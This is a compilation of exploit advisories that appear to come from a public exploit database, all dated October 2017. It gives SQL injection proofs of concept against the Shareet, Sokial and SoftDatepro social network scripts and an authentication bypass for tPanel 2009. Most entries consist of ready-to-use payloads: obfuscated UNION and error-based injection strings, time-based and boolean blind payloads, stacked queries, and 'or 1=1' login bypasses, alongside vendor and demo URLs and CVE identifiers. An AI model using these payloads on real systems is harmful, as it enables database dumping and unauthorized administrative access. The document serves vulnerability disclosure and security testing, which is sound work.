# Title: Generic UNION query (NULL) - 1 column
# Payload: action=lookup-county&state=' UNION ALL SELECT CONCAT(0x716a717071,0x766a414e736e79524546725053474f72754d764a4772697a65666a7551464b46435141414d4e616c,0x7170707071)-- hvbM
#
# Etc..
# # # # #
# # # # #
# Exploit Title: Shareet - Photo Sharing Social Network - SQL Injection
# Dork: N/A
# Date: 30.10.2017
# Vendor Homepage: https://odallated.com/
# Software Link: https://www.codester.com/items/4910/shareet-photo-sharing-social-network
# Demo: https://odallated.com/shareet/demo/
# Version: N/A
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2017-15979
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/?photo=[SQL]
#
# Parameter: photo (GET)
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind
# Payload: photo=saSihSiRf1E' AND SLEEP(5) AND 'DUqs'='DUqs
#
# Etc..
# # # # #
# # # # #
# Exploit Title: Sokial Social Network Script 1.0 - SQL Injection
# Dork: N/A
# Date: 30.10.2017
# Vendor Homepage: http://www.sokial.net/
# Software http://www.sokial.net/demonstrations-social-network.sk
# Demo: http://demo.sokial.net/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2017-15973
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/admin/members_view.php?id=[SQL]
#
# 2271+aND(/*!00033SelEcT*/+0x30783331+/*!00033frOM*/+(/*!00033SelEcT*/+cOUNT(*),/*!00033cOnCaT*/((/*!00033sELECT*/(/*!00033sELECT*/+/*!00033cOnCaT*/(cAST(dATABASE()+aS+/*!00033cHAR*/),0x7e,0x496873616E53656e63616e))+/*!00033FRoM*/+iNFORMATION_sCHEMA.tABLES+/*!00033wHERE*/+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(/*!00033rAND*/(0)*2))x+/*!00033FRoM*/+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)+/*!00033aNd*/+1=1
#
# Parameter: id (GET)
# Type: boolean-based blind
# Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
# Payload: id=2271 RLIKE (SELECT (CASE WHEN (8371=8371) THEN 2271 ELSE 0x28 END))
#
# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
# Payload: id=2271 AND (SELECT 9357 FROM(SELECT COUNT(*),CONCAT(0x7176716a71,(SELECT (ELT(9357=9357,1))),0x717a6b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
#
# Type: stacked queries
# Title: MySQL > 5.0.11 stacked queries (comment)
# Payload: id=2271;SELECT SLEEP(5)#
#
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 OR time-based blind
# Payload: id=2271 OR SLEEP(5)
#
# Etc..
# # # # #
# # # # #
# Exploit Title: SoftDatepro Dating Social Network 1.3 - SQL Injection
# Dork: N/A
# Date: 30.10.2017
# Vendor Homepage: http://www.softdatepro.com/
# Software Link: https://codecanyon.net/item/softdatepro-build-your-own-dating-social-network/3650044
# Demo: http://demo.softdatepro.com/
# Version: 1.3
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2017-15972
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/viewprofile.php?profid=[SQL]
# http://localhost/[PATH]/viewmessage.php?sender_id=[SQL]
#
# -263'++/*!08888UNION*/+/*!08888ALL*/+/*!08888SELECT*/+0x31,0x32,(/*!08888SElEct*/+ExpOrt_sEt(5,@:=0,(/*!08888sElEct*/+cOunt(*)/*!08888frOm*/(infOrmatiOn_schEma.cOlumns)whErE@:=ExpOrt_sEt(5,ExpOrt_sEt(5,@,/*!08888tablE_namE*/,0x3c6c693E,2),/*!08888cOlumn_namE*/,0xa3a,2)),@,2)),0x34,0x35,0x36,0x37,0x38,0x39,0x3130,0x3131,0x3132,0x3133,0x3134,0x3135,0x3136--+-
#
# http://localhost/[PATH]/admin
#
# Email: 'or 1=1 or ''=' Pass: anything
#
# Etc..
# # # # #
# # # # #
# Exploit Title: tPanel 2009 - Authentication Bypass
# Dork: N/A
# Date: 30.10.2017
# Vendor Homepage: http://www.datacomponents.net/
# Software Link: http://www.datacomponents.net/products/hosting/tpanel/
# Demo: http://demo.datacomponents.net/tpanel/
# Version: 2009
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2017-15974
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
#
# http://localhost/[PATH]/login.php
#
# User: 'or 1=1 or ''=' Pass: anything
#
# Etc..
# # # # #